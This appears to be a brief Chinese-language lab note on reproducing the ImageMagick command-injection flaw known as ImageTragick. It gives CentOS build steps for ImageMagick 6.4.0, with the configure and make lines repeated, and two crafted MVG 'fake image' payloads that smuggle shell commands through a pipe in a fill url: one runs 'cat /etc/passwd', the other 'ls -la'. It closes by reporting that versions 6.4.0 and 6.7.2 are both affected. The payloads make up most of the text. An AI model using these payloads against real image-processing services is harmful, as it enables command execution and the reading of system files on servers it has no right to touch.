centos安装
tar zvxf ImageMagick-6.4.0-0.tar.gz
cd ImageMagick-6.4.0-0
./configure --prefix=/usr/locate/ImageMagick-6.4.0 --with-quantum-depth=8
make
cd ImageMagick-6.4.0-0
./configure --prefix=/usr/locate/ImageMagick-6.4.0 --with-quantum-depth=8
make
make install
伪造图片,把下面的几行内容复制到记事本,然后改为图片名后缀。
注意url那里一定要https才行,后面的cat /etc/passwd是linux命令
push graphic-context
viewbox 0 0 640 480
fill 'url(https://www.vm129.com/a.jpg "|cat /etc/passwd ")'
pop graphic-context
下面这个是freebuf提供的例子,带参数的命令
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|ls "-la)'
pop graphic-context
执行
测试了两个版本6.4.0和6.7.2,都有bug